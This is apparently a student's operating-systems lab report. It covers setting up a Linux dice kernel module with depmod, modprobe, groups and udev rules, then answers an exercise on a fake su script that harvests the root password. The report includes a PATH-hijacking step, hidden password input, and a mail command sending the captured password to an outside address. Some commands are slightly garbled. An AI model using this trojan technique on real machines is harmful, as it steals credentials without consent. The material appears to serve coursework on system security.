# Lab 10

ECE4820 FA2024 Introduction to Operating Systems

518370990004 Jae Heung Park

---

## 1 Project 3: presentations (part 2)

Presentation

## 2 A clean setup

After a couple of hours working in the back of your mum and Mr. Frown you have finally completed
your dice device driver. Although everything is working you have quite enjoyed the process and to have
a feeling of full accomplishment you want to polish your work. For instance you want the module to be
automatically loaded when the system boot ups, and you imagine that if your grandpa had friends with
an account on the same computer they would enjoy playing too.
To solve those questions you need to check the following points:

### Where to copy the dice module for it to be officially known to the kernel?

Kernel module copy path `/lib/modules/` or  
`/lib/modules/$(uname -r)/kernel/drivers/<custom_directory>`
or subdirectory based on their purpose

### What command to run in order to generate the `modules.dep` and map files?

Use `depmod` command to generate dependency map

```shell
depmod -a
```

### How to ensure the dice module is loaded at boot time, and how to pass it options?

Add the module to `/etc/modules` or `/etc/modules-load.d/<filename>.conf`
for some distributions
to ensure it loads at boot.
To pass options, create or edit `/etc/modprobe.d/<module_name>.conf`
with the following content:

```shell
options <module_name> <option1>=<value1> <option2>=<value2>
```

### How to create a new friends group and add grandpa and his friends to it?

First, create a new group. Name will be friends.
Then, add one of OS users to the group.

```shell
sudo groupadd friends
sudo usermod -aG friends <username>
```

### What is udev and how to define rules such that the group and permissions are automatically setup at device creation?

`udev` is Linux device manager. It dynamically control device nodes at `/dev` and handle events.
Define rules by file generation in path `etc/udev/rules.d`, e.g., `10-dice.rules`

```shell
SUBSYSTEM=="<subsystem>", KERNEL=="<device_name>", GROUP="friends", MODE="0660"
```

Then, reload `udev` rules to trigger those

```shell
sudo udevadm control --reload-rules
sudo udevadm trigger
```

## 3 A discreet gambling setup

The challenge is now to get this module on the family computer without anybody noticing it. If someone
tells your mother then both you and your grandpa will get in trouble. So you need a way to get root
access without inputing a wrong password and without knowing it! As it is too risky to open the computer
and take the hard disk to plug it on your own computer you have find another strategy.

### 3.1. Hacking mum?셲 computer

After a bit of thinking you have an interesting idea: on Linux systems the executables can be found in
the PATH, a colon separated list of directories. If more than one binary have the same name, then the one
found first is used. As you know your mum often uses the command su to become root, it thus suffices
to write a simple script called su, place it in a directory of your choice that you then prepend to the PATH
variable. When she will type su it will run your script. To your mum its behaviour should feel similar to
the real su, i.e. prompt for the root password and behave as if a wrong password had been input. In fact
in the background it should send you an email containing the root password and clean up all your traces,
that is delete the script, and reset the PATH to its original value. That way your mum will think she has
made a mistake and will rerun su. That time the correct command will be called and she will gain root
access. Therefore you think of the following points:

### How adjust the PATH, ensure its new version is loaded but then forgotten?

Open `~/.bashrc` or `./zshrc` and add `export PATH=/path/to/directory:$PATH`.
After finish, run `~./bashrc` or `./zshrc` to apply change.

### What is the exact behaviour of `su` when wrong password is input?

When `su` is executed with incorrect password, `perror` will be thrown.

```text
su: Authentication failure
```

Will be printed in terminal.

### When using the read command how to hide the user input?

Use `-s` option to hide input

```shell
read -s <input>
echo
```

### How to send an email from the command line?

CLI based email send requires installation of libraries first.

```shell
sudo apt install mailutils # Linux
brew install mailutils # MacOS
```

This one will be possible

```shell
echo "The root password is: $password" | mail -s "root password" email@site.com
```

Once you have completed this simple script you patiently wait for the email.
